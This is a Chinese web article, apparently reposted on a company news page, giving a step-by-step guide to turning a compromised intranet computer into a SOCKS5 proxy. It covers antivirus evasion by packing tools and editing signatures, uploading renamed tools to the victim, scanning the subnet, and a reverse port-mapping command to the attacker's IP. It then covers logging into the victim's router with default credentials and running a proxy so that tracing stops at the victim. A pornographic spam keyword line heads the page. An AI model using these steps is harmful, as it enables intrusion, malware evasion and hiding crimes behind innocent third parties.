日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何將內(nèi)網(wǎng)肉雞作成Socks5服務(wù)器

內(nèi)網(wǎng)中將肉雞制作成SOCKS5服務(wù)器有人說并不可能,即便成功也無法利用。本篇文章就嘗試通過內(nèi)網(wǎng)制作Socks5服務(wù)器,黑客技術(shù)只是作為一種技術(shù)存在,希望廣大的安全管理員可以通過黑客技術(shù)來加強(qiáng)自己在企業(yè)防護(hù)中的安全防范技術(shù)。不要將黑客技術(shù)用于破壞的途徑上。

首先介紹一下使用的工具,lcx.exe 這是一個反向連接的內(nèi)網(wǎng)端口映射工具,VIDC20.exe也是一個端口映射工具,不過它也有代理服務(wù)器的功能,支持http/socks4/socks5代理,支持代理驗證,支持udp代理,支持二級代理;還有S掃描器,這個只有一個可執(zhí)行文件,小巧方便,掃端口最合適了。這些工具在網(wǎng)上都有下載,在作代理服務(wù)之前,我們需要先作一下免殺,因為大部分殺毒軟件是殺lcx.exe和S掃描器的,如果不作免殺,那一上傳就可能被殺毒軟件給殺掉

像這種強(qiáng)悍的卡巴,在命令行下是沒有辦法中止的,所以只能作免殺了,其他的殺毒軟件在命令行下可以中止,不過需要一些技巧,因為它們都有線程保護(hù),用常規(guī)的方法是中止不了的。我曾經(jīng)在命令行下干掉過瑞星,只是方法比較繁瑣,所以就不在這里演示了。至于免殺方法嘛,只要簡單的加下殼就可以過關(guān)了,據(jù)我實驗,先加個北斗3.5,再加aspack 2.12,之后再加北斗3.5,這樣處理后絕大部分殺軟件就不殺這兩個程序了,呵呵。簡單吧,殺毒軟件也是會區(qū)別對待的,如果是一些流行木馬,加這三重殼是不能免殺的,對于一些不太重要的黑客工具,殺毒軟件就會顯得相對寬松的多了。我們就是鉆的殺毒軟件的這個空子,如果是加了三重殼也過不了殺毒軟件,那就不要怕麻煩將它們的特征碼給修改掉,就可以過殺毒軟件了,修改的方法網(wǎng)上有許多動畫,大家可以自己找找,我的PCSHARE馬就是這樣作的,過卡巴,瑞星、江民、瑞星、金山、諾頓、趨勢等殺毒軟件很輕松,也可以輕松過各種查馬工具,這就是我修改特征碼后加了三重殼作成的,一個超強(qiáng)的工具。呵呵。有些跑題了,言歸正傳。

工具準(zhǔn)備完備后,下面開始作代理了。首先打開你的木馬客戶端程序,將上面的這些工具上傳到內(nèi)網(wǎng)中的肉雞上,就放在WINDOWS目錄里吧,文件名嘛,最好改一下,免得引起對方注意。打開對方的命令符,鍵入命令:ipconfig /all查看一下肉雞的IP地址,如:192.168.0.2,得到這個本機(jī)及網(wǎng)關(guān)的IP地址以后,我們就可以用S掃描器對同它同一網(wǎng)段的IP地址進(jìn)行掃描,看這臺肉雞的網(wǎng)關(guān)是什么類型的。S掃描器相信大家都會用了吧。

命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20

這個s-jk是我加三重殼免殺后的S掃描器,這條命令在整個網(wǎng)段中掃描開放139 3389 1433 80 23端口的主機(jī),呵呵,這是為滲透內(nèi)部網(wǎng)絡(luò)作準(zhǔn)備,也許有很重要的信息出現(xiàn)呢。

經(jīng)過掃描發(fā)現(xiàn)這臺肉雞的網(wǎng)關(guān)開放80號端口,這說明這臺網(wǎng)關(guān)一定是臺路由器。那怎樣登錄進(jìn)它的路由器呢?大家都知道寬帶路由器在外網(wǎng)中是不能登錄的,只能由它的內(nèi)部網(wǎng)絡(luò)登錄,難道要進(jìn)肉雞的屏幕控制,用肉雞的IE登錄?非也,這樣很容易暴露,再說肉雞上的管理員也許現(xiàn)在正在電腦前工作,你是根本沒有辦法進(jìn)行控制的,下面在自己的電腦上打開命令提示符,命令:lcx -listen 21 8000 再回到肉雞的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解釋一下:218.57.179.152是我的外網(wǎng)IP,這樣就將肉雞的寬帶路由器的80端口映射到了我的電腦的21端上了,我連接本機(jī)的8000端口就可以了。

下一步就要打開IE,地址欄中鍵入:http://127.0.0.1:8000回車后,盼望已久的并且很熟悉的登錄界面出現(xiàn)了。這正是寬帶路由器的登錄界面,只不過這不是我的寬帶路由器,而是另一個局域網(wǎng)的寬帶路由器,我熟練的鍵入的默認(rèn)用戶名及密碼,admin admin,確定后成功登錄了。

接下來的工作簡直就是輕車熟路了,設(shè)置一個虛擬服務(wù)器指向這臺肉雞,端口設(shè)置成了個陌生的端口,不要設(shè)置成8080,因為寬帶路由器要使用這個端口,它是不允許設(shè)置成這個端口的,我設(shè)置的是2233,保存后,我們再回到肉雞的命令行下,命令:vidc20 -d -p 2233 這個命令的意思就是以控制臺的方式啟動vidc20.exe這個程序,開2233服務(wù)端口提供代理服務(wù)。這臺肉雞已經(jīng)開始提供SOCK5服務(wù)了,并且路由器上的映射也已經(jīng)正常工作,我們要作的就是打開SOCK5客戶端程序,設(shè)置一下SOCKS5服務(wù)器的IP地址及端口,也就是這臺肉雞的外網(wǎng)IP。我們將IE的圖標(biāo)拖到SocksCap32的圖標(biāo)上創(chuàng)建了一個新快捷方式,這樣以后我們登錄到ASP馬時就可以雙擊SocksCap32中的IE進(jìn)行登錄了。如果你覺得不放心,可以登錄www.123cha.com,查看一下IP,IP地址顯示的是你的肉雞的IP,使用這種代理比使用匿名的HTTP代理還要安全的多,因為給你提供代理的是臺個人電腦,并且IP不固定,在一個局域網(wǎng)內(nèi)部,沒有一些監(jiān)控軟件記錄任何的連接,并且這臺個人電腦重啟后vidc20.exe并不在運(yùn)行,可以說是毫無痕跡,這樣即使有人追查你的話,也只能查到你肉雞的IP為止,再想繼續(xù)追查就不太容易了。

有人說如果管理員把寬帶路由器的密碼改掉了,那不是沒得玩了,我隨機(jī)挑選了五個局域網(wǎng)進(jìn)行測試,全部是默認(rèn)口令,看來設(shè)置默認(rèn)口令的概率還是滿高的。我分析了一下原因:一、可能是寬帶路由器只能由內(nèi)網(wǎng)連接,管理員對其安全性認(rèn)識不足。二、內(nèi)網(wǎng)中的電腦用戶都是菜鳥,不需要作安全設(shè)置。三、管理員懈怠,沒把它當(dāng)回事。說實話我的寬帶路由器也是設(shè)置的默認(rèn)口令,為什么沒有改掉呢?我覺得我應(yīng)該屬于第二種情況吧,內(nèi)網(wǎng)中全部是菜鳥用戶,所以根本必要修改掉,這樣就暴露了一個安全問題,一旦內(nèi)網(wǎng)中的電腦中了木馬,入侵者就有可能獲得你的寬帶帳號,用你的寬帶帳號刷Q幣、刷業(yè)務(wù);還可能登錄你的ISP將你的寬帶帳號給修改掉,讓你上不了網(wǎng)了。如果入侵者拿你作跳板,他作了壞事由你背黑鍋,那豈不是更加冤枉。所以,大家一定對內(nèi)網(wǎng)的安全問題提高警惕。該打的補(bǔ)丁打上,該修改的默認(rèn)口令給修改掉,這樣就可以抵御大多數(shù)初級的入侵者的攻擊了。但要想絕對安全,那是不可能的,這個世界上沒有絕對的安全。
 

【編輯推薦】

  1. 黑客不愛軟件漏洞 更喜歡利用錯誤配置
  2. “90后”黑客攻擊南京房管局網(wǎng)站
  3. Black Hat和Defcon黑客大會的五大看點
  4. 路由器漏洞:黑客展示如何攻陷百萬臺
  5. 揭秘黑客手中DDoS攻擊利器——黑色能量2代

當(dāng)前標(biāo)題:如何將內(nèi)網(wǎng)肉雞作成Socks5服務(wù)器
文章位置:http://m.5511xx.com/article/ccogpse.html